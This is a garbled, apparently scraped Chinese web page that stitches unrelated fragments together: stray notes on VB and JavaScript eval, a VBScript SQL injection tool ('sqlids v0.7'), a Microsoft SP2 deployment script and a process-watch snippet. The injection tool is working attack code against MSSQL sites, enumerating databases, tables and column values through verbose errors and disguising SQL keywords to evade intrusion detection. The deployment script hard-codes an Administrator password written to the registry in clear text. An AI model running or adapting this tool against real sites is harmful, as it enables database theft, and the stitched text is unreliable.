移动小精灵脚本开发如何进路由器


笔者在初步研究了Windows的SYSTEM.INI后发现,通过VB的多媒体控件MCI.VBX可以打开MPEG压缩文件(如VCD2.0版的.DAT文件)

代码:


解释:
1、string.replace(regexp, replacement): replacement可以是function. In this case, the function is invoked for each match, and the string it returns is used as the replacement text.

2、new Function(argument_names..., body): 注意参数中的body. 这样,用new Function('body')()
, 也可以像eval一样动态执行代码

视频脚本大纲

输入中文后英文要取决于你的电脑会讲英文还是中文当需要更新整个表中的信息时,可以使用这个常量


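' Entry glue for the sqlids script: grab the command line, refuse the GUI host,
' and print the help when no arguments were given.
set arg=wscript.arguments

' Every result below is written with wsh.echo; under wscript.exe each line
' becomes a blocking message box, so only cscript.exe is usable.
' Bug fix: LCase() never yields upper-case letters, so the original comparison
' against "Wscript.Exe" was always False and this guard never fired.
If (LCase(Right(Wscript.fullname,11))="wscript.exe") Then
Wscript.Quit
End If
' No arguments at all: show the usage text (Sub usage, defined below) and exit.
if arg.count=0 then
usage()
Wscript.Quit
End If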

' Prints the command-line help for this script (messages are in Chinese).
' NOTE(review): the echo lines for "table", "filed", "result" and "search" are
' each broken across two physical lines by the page extraction; VBScript
' string literals cannot span lines, so they must be rejoined before the
' script parses.
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo ""
wsh.echo ""
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub


' Fetches Path with GetBody (raw response bytes) and decodes those bytes as
' GB2312 text with BytesToBstr. Both helpers are defined later in this file.
Function getHTTPPage(Path)
Dim rawBytes
rawBytes=GetBody(Path)
getHTTPPage=BytesToBstr(rawBytes, "GB2312")
End Function

' Despite its name this only replaces literal spaces with "%20"; every other
' character (including "%", "&" and "=") is passed through untouched, and the
' callers rely on that because they pre-encode their own parameters.
' str is ByRef (VBScript default), so the caller's variable is rewritten too.
Function UrlEncode(str)
str=Replace(str," ","%20")
UrlEncode=str
End Function

' Fetches url with Microsoft.XMLHTTP and returns the raw response body (byte
' array). Everything after the first "?" is sent as the POST body; the part
' before it is the request target.
Function GetBody(url)' XMLHTTP fetches the page source; can be changed to cookie or GET submission
' On Error Resume Next swallows every failure below: a url without "?" makes
' Aurl(1) a subscript-out-of-range, and a connection error leaves GetBody Empty,
' so callers cannot distinguish a failed request from an empty page.
On Error Resume Next
Aurl=Split(url,"?") 'split for the POST submission: Aurl(0) is the target, Aurl(1) the body
Set Retrieval=CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
' Advertises gzip/deflate, but nothing here decompresses a compressed reply;
' a server that honours the header returns bytes BytesToBstr cannot decode.
.setRequestHeader "Accept-Encoding", "gzip, deflate"
' Fixed MSIE 7 User-Agent string (the literal is wrapped across two physical
' lines by the page extraction and must be rejoined to parse).
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'POST submission (UrlEncode only escapes spaces)
GetBody=.ResponseBody
.abort
End With
Set Retrieval=Nothing
End Function


' Converts a raw byte array (e.g. XMLHTTP.ResponseBody) to a VBScript string by
' writing it into an ADODB.Stream in binary mode and reading it back as text
' in the character set named by Cset (e.g. "GB2312").
Function BytesToBstr(Body, Cset)
Dim stm
Set stm=CreateObject("adodb.stream")
With stm
.Type=1          ' adTypeBinary: accept the byte array
.Mode=3          ' adModeReadWrite
.Open
.Write Body
.Position=0      ' rewind before switching the stream to text
.Type=2          ' adTypeText
.Charset=Cset
BytesToBstr=.ReadText
.Close
End With
Set stm=Nothing
End Function


' Rewrites Value by inserting "%" into the SQL keywords listed in Table
' (e.g. "select" -> "se%lect"); the author's stated intent is to slip past
' signature-based filtering. From the defensive side the same pattern is a
' usable detection signature: SQL keywords broken by a stray percent sign do
' not occur in legitimate parameter values.
' Substitutions are plain, case-sensitive Replace() calls applied in list
' order, so they also hit keywords embedded in longer words.
' NOTE(review): the Table literal is wrapped over five physical lines by the
' page extraction and must be rejoined before the script parses.
Function ReplaceKeyWord(Value)' evade IDS filtering (author's note)
Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
' Each entry is "keyword->replacement"; entries are separated by "|[k]|".
Relpacement=Split(Table, "|[k]|")
ReplaceKeyWord=Value
For i=0 to UBound(Relpacement)
Temp=Split(Relpacement(i), "->")
If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function


' Extracts the quoted value from a verbose MSSQL conversion-error page: takes
' the text after the first "varchar" and returns what sits between the first
' pair of single quotes that follows. Input without "varchar" is returned
' unchanged. If "varchar" is present but no quote follows, parts(1) raises
' subscript out of range, exactly as the original did.
' Mitigation note: this parser only works because the application echoes the
' database's conversion error; a generic error page removes the signal.
Function result(sHTMLTEMP) ' author's note: splits the page on "varchar"; a regex would be neater
Dim parts
parts=Split(sHTMLTEMP, "varchar")
If UBound(parts) > 0 Then
parts=Split(parts(1), "'")
result=parts(1)
Else
result=sHTMLTEMP
End If
End Function

' Encodes strHEx as an MSSQL hex literal in the nvarchar (UTF-16LE) layout:
' each character becomes its ASCII code in hex followed by "00",
' so "ab" -> "0x61006200" and "" -> "0x". Only meaningful for codes below 256.
Function Str2HEx(strHEx)
Dim pos, acc
acc=""
For pos=1 To Len(strHEx)
acc=acc & Hex(Asc(Mid(strHEx, pos, 1))) & "00"
Next
Str2HEx="0x" & acc
End Function

' Encodes strHEx as an MSSQL hex literal in the varchar layout: one ASCII
' code in hex per character, so "ab" -> "0x6162" and "" -> "0x".
Function Str2HExtwo(strHEx)
Dim pos, acc
acc=""
For pos=1 To Len(strHEx)
acc=acc & Hex(Asc(Mid(strHEx, pos, 1)))
Next
Str2HExtwo="0x" & acc
End Function


' Deduplicates a comma-separated list, keeping first occurrences in order.
' Quirks preserved from the original: membership is tested with Instr against
' the accumulated output, so a value that is a substring of an earlier one is
' dropped as well, and the trailing comma is only omitted when the LAST input
' element is new (MoveR("a,b,b") yields "a,b,").
Function MoveR(Rstr)
Dim idx, items, lastIdx
items=Split(Rstr, ",")
lastIdx=UBound(items)
For idx=0 To lastIdx
If idx=0 Then
MoveR=MoveR & items(idx) & ","
ElseIf Instr(MoveR, items(idx))=0 Then
If idx=lastIdx Then
MoveR=MoveR & items(idx)
Else
MoveR=MoveR & items(idx) & ","
End If
End If
Next
End Function


' Fetches the global url (arg(0)) with the SQL fragment appended after a space
' (UrlEncode turns that space into "%20" on the wire) and strips every double
' quote from the page so result() sees plain text. ReplaceKeyWord is applied
' to the fragment first. The usage examples pass url as "id=1", i.e. the
' parameter the fragment attaches to.
function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function

' Main dispatch on arg(1). Every branch builds an error-based MSSQL fragment,
' sends it through page() and parses the verbose conversion error with
' result(). Server-side mitigation is the usual pair: parameterised queries
' and no database error text returned to the client. Each branch also emits a
' burst of near-identical requests that differ only in a counter, which is a
' straightforward web-log signature.
url=arg(0)

injection=arg(1)


'-------------------------------------- The following code holds the injection statements; none of them need quotes
select case arg(1)

' "limit": compare page lengths to infer the role of the database login.
Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'Statements kept separate for easy editing: the first tests sa, the second DB_owner
' (role names are passed as hex-encoded nvarchar, see Str2HEx).
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"

' Quirk: when both probes match the baseline length, "SA" is printed above
' and "PUBLIC" below, because the And clause excludes the SA case here.
If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If

' Four probes for server name, version, login and current database.
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name

' "dbname": walk db_name(i) until the response no longer contains "varchar".
case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" 'database-name disclosure statement
Body=page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

' "table": same loop shape over sysobjects of the database named in arg(2).
' NOTE(review): the sql literal is wrapped across two physical lines by the
' page extraction and must be rejoined to parse.
case "table"
i=1
Do
' table-name statement; arg(2) is the database
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body=page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

' "filed": arg(2) database, arg(3) table. Looks up the table id, counts its
' columns, then fetches one column name per request. Fragments here are
' pre-obfuscated with "%" by hand (see ReplaceKeyWord for the same pattern).
' NOTE(review): sqlbiaoid and sqlfiled are wrapped across two physical lines
' by the page extraction.
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"个"
' k is the column count as a string; VBScript coerces it for the loop bound.
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt


' "result": arg(2) column, arg(3) database, arg(4) table. Counts the rows,
' then fetches one value per request ordered by the column.
' NOTE(review): sqlneirong is wrapped across two physical lines by the page
' extraction.
case "result"

i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" 'row-count disclosure statement
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
For i=1 To k
sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body=page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next


' "search": up to 10 "table|column" hits whose column name contains arg(2)
' (hex-encoded with Str2HExtwo), deduplicated with MoveR and timed.
' NOTE(review): sqlsearch appears with all spaces removed ("selecttop1t_name",
' "fromsyscolumnswhere"); that looks like an extraction artefact rather than
' the author's text — confirm against the original.
Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
TimeSpend=Timer
For i=1 To 10 'change this 10 as needed
sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--"
Body=page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend=round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用时:" & TimeSpend & "秒."




' Case Else already means arg(1) matched none of the modes; the If below is
' redundant and, being an Or-chain of inequalities, is always True anyway
' (And was intended). Harmless: the usage text is printed either way.
Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意参数"
usage()
End if
end select

实际刚才录下的声音文件在每个数字声波间隔中还有很大一段没有有用信息的空间


'******************************************************************************
' install.vbs
' Author: Peter Costantini, the Microsoft Scripting Guys
' Date: 9/1/04
' Must be deployed to a client and launched remotely by scenario1.vbs.
' Assumes that runonce.vbs is in same directory as script.
' Assumes that Windows XP Service Pack 2 setup program is on a remote server
' and runonce.vbs are in same directory as script.
' 1. Runs Service Pack 2 setup program from remote server to install
' Windows XP Service Pack 2. This could take one or two hours.
' 2. Configures the AutoAdmin and RunOnce registry settings necessary
' to run runonce.vbs.
' 3. Logs results to text file, <computername>-sp2-instlog.txt and copies
' the file back to admin workstation.
' 4. Forces a reboot of the local machine so that the AutoAdmin and RunOnce
' registry settings take effect.
'******************************************************************************

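' Phase 1 driver: install SP2, configure auto-logon + RunOnce, then reboot.
' The page showed this listing with every space stripped; it is restored here
' to parseable VBScript. On Error Resume Next is load-bearing: InstallSP and
' CopyLog inspect Err after risky calls instead of letting the script abort.
On Error Resume Next

' Initialize global constants and variables.
Const FOR_APPENDING = 8
g_strLocalFolder = "c:\temp-ac"
' Change name of computer to actual administrative workstation or local
' path to which log should be copied.
g_strRemoteFolder = "\\<adminwkstn>\c$\temp-ac"

' Get computer name (WMI; see GetComputerName below).
g_strComputer = GetComputerName
g_strLogFile = g_strComputer & "-sp2-instlog.txt"

' Create log file (relative to the current directory).
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextStream = objFSO.OpenTextFile(g_strLogFile, FOR_APPENDING, True)
objTextStream.WriteLine "Windows XP Service Pack 2 " & _
    "Installation and Configuration Log: Phase 1"
objTextStream.WriteLine Now
objTextStream.WriteLine g_strComputer
objTextStream.WriteLine String(Len(g_strComputer), "-")

' Handle logic of calling functions and sub-routines to install Service Pack 2
' and configure Auto Administration. Each failure copies the log home and stops.
blnInstallSP = InstallSP
If blnInstallSP = False Then
    CopyLog
    WScript.Quit
End If
blnAutoAdmin = ConfigAutoAdmin
If blnAutoAdmin = False Then
    CopyLog
    WScript.Quit
End If
Reboot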

'******************************************************************************

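' Returns the local machine's name from WMI Win32_ComputerSystem. The query
' yields one row on a normal host, so the For Each simply captures the last
' (only) Name. Returns Empty if WMI is unavailable — errors are swallowed by
' the script-level On Error Resume Next. (Spacing restored from the stripped
' listing on the page.)
Function GetComputerName

    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\." _
        & "\root\cimv2")
    Set colSystems = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
    For Each objSytem In colSystems
        GetComputerName = objSytem.Name
    Next

End Function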

'******************************************************************************

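' Runs the SP2 setup program from the network share and waits for it to exit.
' Returns True when the process could be started and has finished, False when
' Exec itself failed (share unreachable, file missing). The installer's own
' exit code is now logged but does not affect the return value, so callers
' still treat "ran" as "succeeded" exactly as before.
' Security note: whatever binary sits at strInstallPath runs with this
' script's (administrative) rights; the share must not be writable by
' unprivileged users. (Spacing restored from the stripped listing on the page.)
Function InstallSP

    ' Edit this line to include the server and share name where the Windows XP
    ' Service Pack 2 setup program is located.
    strInstallPath = "\\servername\xpsp2\WindowsXP-KB835935-SP2-ENU.exe" & _
        " /quiet /norestart /o"

    Set WshShell = CreateObject("Wscript.Shell")
    Set objExec = WshShell.Exec(strInstallPath)
    ' This could take one or two hours.
    objTextStream.WriteLine "Installation started..."
    If Err = 0 Then
        ' Loop until Exec is finished - Status = 1.
        Do While objExec.Status = 0
            ' Pause for 10 seconds before checking.
            ' To reduce network traffic, make interval longer.
            WScript.Sleep 10000
        Loop
        ' Record the installer's exit code so a setup that ran but failed is
        ' visible in the log (the original logged only "completed").
        objTextStream.WriteLine "Installer exit code: " & objExec.ExitCode
        objTextStream.WriteLine "Service Pack 2 installation completed."
        InstallSP = True
    Else
        objTextStream.WriteLine "Unable to install Service Pack 2." & VbCrLf & _
            "Error connecting to Service Pack 2 on server." & VbCrLf & _
            "Error number: " & Err.Number & VbCrLf & _
            "Error source: " & Err.Source & VbCrLf & _
            "Error description: " & Err.Description
        InstallSP = False
    End If
    Err.Clear

End Function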

'******************************************************************************

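' Writes the Winlogon auto-logon values and a RunOnce entry so runonce.vbs
' runs after the reboot. Returns True only if every registry write returned 0.
'
' SECURITY: AutoAdminLogon stores strDefaultPassword in clear text under
' HKLM\...\Winlogon\DefaultPassword, and the credentials are hard-coded in
' this script. Treat the setting as transient — runonce.vbs must remove
' DefaultPassword and AutoAdminLogon again — use a dedicated account, and
' rotate its password after the rollout. The RunOnce entry executes
' g_strLocalFolder\runonce.vbs as that account at next logon, so the folder
' must not be writable by unprivileged users.
' (Spacing restored from the stripped listing; in particular the Winlogon key
' lives under "Windows NT", which the stripped text rendered as "WindowsNT".)
Function ConfigAutoAdmin

    Const HKEY_LOCAL_MACHINE = &H80000002
    strKeyPath1 = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    strKeyPath2 = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    strDefaultUserName = "Administrator"
    strDefaultPassword = "P@ssw0rd"
    strDefaultDomainName = "Contoso"
    intAutoAdminLogon = 1
    strRunOnceEntry = "MyScript"
    strRunoncePath = g_strLocalFolder & "\runonce.vbs"

    ' NOTE(review): the page shows a single backslash before g_strComputer here
    ' and in Reboot; the usual moniker form is "!\\" & computer — confirm
    ' against the original source before relying on it.
    Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\" & _
        g_strComputer & "\root\default:StdRegProv")

    ' Set DefaultUserName to user with Administrator credentials.
    intRet1 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "DefaultUserName", strDefaultUserName)
    If intRet1 <> 0 Then
        objTextStream.WriteLine "Error: DefaultUserName not configured."
    End If

    ' Set DefaultPassword to password of default user name (clear text, see above).
    intRet2 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "DefaultPassword", strDefaultPassword)
    If intRet2 <> 0 Then
        objTextStream.WriteLine "Error: DefaultPassword not configured."
    End If

    ' Uncomment next 5 lines and edit last parameter if default domain
    ' for the credentials is different from that already set.
    'intRet3 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
    '    "DefaultDomainName", strDefaultDomainName)
    'If intRet3 <> 0 Then
    '    objTextStream.WriteLine "Error: DefaultDomainName not configured."
    'End If

    ' Turn on AutoAdminLogon.
    intRet4 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "AutoAdminLogon", "1")
    If intRet4 <> 0 Then
        objTextStream.WriteLine "Error: AutoAdminLogon not configured."
    End If

    ' Add MyScript entry to RunOnce subkey.
    intRet5 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath2, _
        strRunOnceEntry, strRunoncePath)
    If intRet5 <> 0 Then
        objTextStream.WriteLine "Error: MyScript RunOnce entry not configured."
    End If

    ' Check that all registry write operations succeeded. intRet3 stays Empty
    ' while the domain block is commented out, which VBScript adds as 0.
    If (intRet1 + intRet2 + intRet3 + intRet4 + intRet5) = 0 Then
        objTextStream.WriteLine "AutoAdminLogon and RunOnce configured."
        ConfigAutoAdmin = True
    Else
        objTextStream.WriteLine "Error: AutoAdminLogon and RunOnce not fully " & _
            "configured."
        ConfigAutoAdmin = False
    End If

End Function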

'******************************************************************************

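' Forces a reboot through WMI Win32_OperatingSystem.Win32Shutdown(6) so the
' AutoAdminLogon/RunOnce settings take effect. The log is copied first; if the
' shutdown call fails, the log is reopened, the return code recorded and the
' copy repeated. (Spacing restored from the stripped listing on the page.)
Sub Reboot

    Const FORCED_REBOOT = 6
    ' NOTE(review): single backslash before g_strComputer as shown on the page;
    ' see the same remark in ConfigAutoAdmin.
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate," & _
        "(Shutdown)}!\" & g_strComputer & "\root\cimv2")
    Set colOSes = objWMIService.ExecQuery("SELECT * FROM Win32_OperatingSystem")
    objTextStream.WriteLine "Attempting to reboot..."
    CopyLog
    For Each objOS In colOSes ' Only one objOS in collection
        intReturn = objOS.Win32Shutdown(FORCED_REBOOT)
        If intReturn <> 0 Then
            Set objTextStream = objFSO.OpenTextFile(g_strLogFile, FOR_APPENDING, True)
            objTextStream.WriteLine Now
            objTextStream.WriteLine "Error: Unable to reboot." & VbCrLf & _
                "Return code: " & intReturn
            CopyLog
        End If
    Next

End Sub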

'******************************************************************************

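' Closes the log and copies it to g_strRemoteFolder on the admin workstation,
' creating the folder if needed. A failure to create the folder is cleared and
' aborts the copy silently — the log is already closed and cannot record it.
' (Spacing restored from the stripped listing on the page.)
Sub CopyLog

    ' Close text file.
    objTextStream.WriteLine "Closing log and attempting to copy file to " & _
        "administrative workstation."
    objTextStream.WriteLine
    objTextStream.WriteLine String(80, "-")
    objTextStream.WriteLine
    objTextStream.Close

    ' Copy log.
    If Not objFSO.FolderExists(g_strRemoteFolder) Then
        objFSO.CreateFolder(g_strRemoteFolder)
        If Err <> 0 Then
            Err.Clear
            Exit Sub
        End If
    End If
    ' CopyFile only treats the destination as a folder when it ends with a path
    ' separator; g_strRemoteFolder has none. The page showed `& ""` here, which
    ' reads as an extraction artefact of `& "\"` — without the separator the
    ' copy targets the folder itself as a file name and fails.
    objFSO.CopyFile g_strLogFile, g_strRemoteFolder & "\"

End Sub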
如木马、端口扫描器、客户端工具、CGI漏洞扫描器……

' Fragment of a process-watching script; the rest is not on this page.
strComputer="." ' "." selects the local machine for WMI
arrTargetProcs=Array("calc.exe", "notepad.exe", "other.exe")
'The array holds the names of the processes to watch

您被禁用->


即使如此,也是为了进行错误处理。
